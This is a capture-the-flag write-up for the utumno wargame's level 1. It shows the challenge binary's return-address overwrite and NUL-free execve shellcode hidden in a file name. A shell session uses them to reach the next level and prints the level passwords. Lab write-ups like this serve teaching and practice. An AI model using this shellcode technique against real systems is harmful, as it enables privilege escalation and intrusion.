
utumno - 1

/* utumno1.c */

#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/** stack environment of main
*	env
*	argv
*	argc
*	eip
*	ebp
*	align
*	stack of main
*/

/** stack environment of run (after `push %ebp; mov %esp,%ebp`)
*	filename + 3   (the argument: a pointer into the directory-entry name)
*		<== ebp + 0x08
*	eip            (saved return address -- the slot run() overwrites)
*		<== ebp + 0x04
*	ebp            (caller's saved frame pointer)
*		<== ebp
*	local slot     (receives the value ebp + 0x04)
*		<== ebp - 0x04
*/
/*
 * run(): reconstructed from the binary's disassembly, so the body is kept as
 * the original x86-32 instructions rather than C.  This is the vulnerable
 * function: it stores its own `filename` argument over its saved return
 * address, so `ret` transfers control to the bytes of the directory-entry
 * name that main() passed in (attacker-controlled content).
 */
void run(char *filename)
{
push   %ebp                 /* prologue: [ebp] = saved ebp, [ebp+4] = return address, */
mov    %esp,%ebp            /* [ebp+8] = filename (cdecl, first argument) */
sub    $0x10,%esp           /* reserve 16 bytes of locals */
lea    -0x4(%ebp),%eax      /* eax = ebp - 4 (address of the local slot) */
add    $0x8,%eax            /* eax = ebp + 4 -- the saved return address */
mov    %eax,-0x4(%ebp)      /* stash that pointer in the local slot */
mov    -0x4(%ebp),%eax      /* reload it into eax */
mov    0x8(%ebp),%edx       /* edx = filename (pointer into the entry name) */
mov    %edx,(%eax)          /* *(ebp+4) = filename: return address overwritten */
leave
ret                         /* pops `filename` as the return address -> executes the name bytes */
}

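/*
 * Entry point (reconstructed from the binary): scans the directory named by
 * argv[1] and, for every entry whose name begins with "sh_", calls run() with
 * a pointer to the remainder of that name.
 *
 * Security note: argv[1] and every entry name are chosen by whoever created
 * the directory, so run() receives a pointer to attacker-controlled bytes.  A
 * directory-entry name may contain any byte except '/' and NUL, which is the
 * only filter applied to what reaches run().
 *
 * Returns 0 once the directory has been scanned; exits with status 1 when no
 * directory argument is given or it cannot be opened.
 */
int main(int argc, char *argv[])
{
	/* argc < 2 also guards the argc == 0 case, where argv[1] is out of bounds. */
	if (argc < 2 || argv[1] == NULL)
		exit(1);

	/* opendir() returns a DIR *, not a DIR by value. */
	DIR *dirp = opendir(argv[1]);
	if (dirp == NULL)
		exit(1);

	struct dirent *direntp;
	while ((direntp = readdir(dirp)) != NULL) {
		/* strncmp() returns an int, so compare against 0 (not NULL);
		 * the POSIX name member is d_name. */
		if (strncmp("sh_", direntp->d_name, 3) == 0)
			run(direntp->d_name + 3);
	}

	closedir(dirp);
	return 0;
}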


shellcode.asm

; nasm -f elf64 shellcode.asm -g -F stabs -o shellcode.o
; for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
;
; NOTE(review): the code below is BITS 32 and uses int 0x80, so `-f elf32`
; matches it better; the extracted byte string should be identical either way,
; since only the ELF container differs.
;
; Constraint: these bytes are smuggled in as a directory-entry name (see the
; `touch` in the transcript), so the shellcode must contain no 0x00 and no
; 0x2f ('/').  Every instruction choice below is made to avoid NUL bytes.

BITS 32

global _start
section .text

; syscalls kernel
SYS_EXECVE equ 0x0b

_start:
; ln -sf /bin/sh UUUU
; execve("UUUU", 0, 0);
; "UUUU" is a relative path, resolved against the cwd of the exploited
; process -- hence the symlink is created in the directory the binary is run
; from, not inside the scanned directory.
push SYS_EXECVE ; SYS_EXECVE = 11 (push imm8 / pop avoids the zero bytes of `mov eax, 11`)
pop eax         ; set SYS_EXECVE to eax

xor esi, esi    ; clean esi (xor instead of `mov esi, 0` to avoid NUL bytes)
push esi        ; esi is zero -> becomes the string's NUL terminator
push 0x55555555 ; push 'UUUU' -> stack now holds "UUUU\0"

; execve("UUUU", 0, 0);
;             ^
;             |
;            ebx
mov ebx, esp    ; ebx = pointer to "UUUU\0" on the stack

; execve("UUUU", 0, 0);
;                     ^
;                     |
;                    ecx
xor ecx, ecx    ; clean ecx (argv = NULL; Linux accepts this)

; execve("UUUU", 0, 0);
;                        ^
;                        |
;                       edx
mov edx, ecx    ; set zero to edx (envp = NULL)
int 0x80        ; syscall execve

root@today:~/Desktop/misc/utumno/utumno1# ssh utumno1@178.79.134.250

utumno1@178.79.134.250's password: aathaeyiew

utumno1@melinda:~$ cd /tmp

utumno1@melinda:/tmp$ mkdir utu1

utumno1@melinda:/tmp$ cd utu1

utumno1@melinda:/tmp/utu1$ mkdir dir

utumno1@melinda:/tmp/utu1$ ls
dir

utumno1@melinda:/tmp/utu1$ cd dir

utumno1@melinda:/tmp/utu1/dir$ touch `python -c 'print "sh_\x6a\x0b\x58\x31\xf6\x56\x68\x55\x55\x55\x55\x89\xe3\x31\xc9\x89\xca\xcd\x80"'`

utumno1@melinda:/tmp/utu1/dir$ cd ..

utumno1@melinda:/tmp/utu1$ ln -sf /bin/sh UUUU

utumno1@melinda:/tmp/utu1$ /utumno/utumno1 dir
$ whoami
utumno2
$ cat /etc/utumno_pass/utumno2
ceewaceiph
$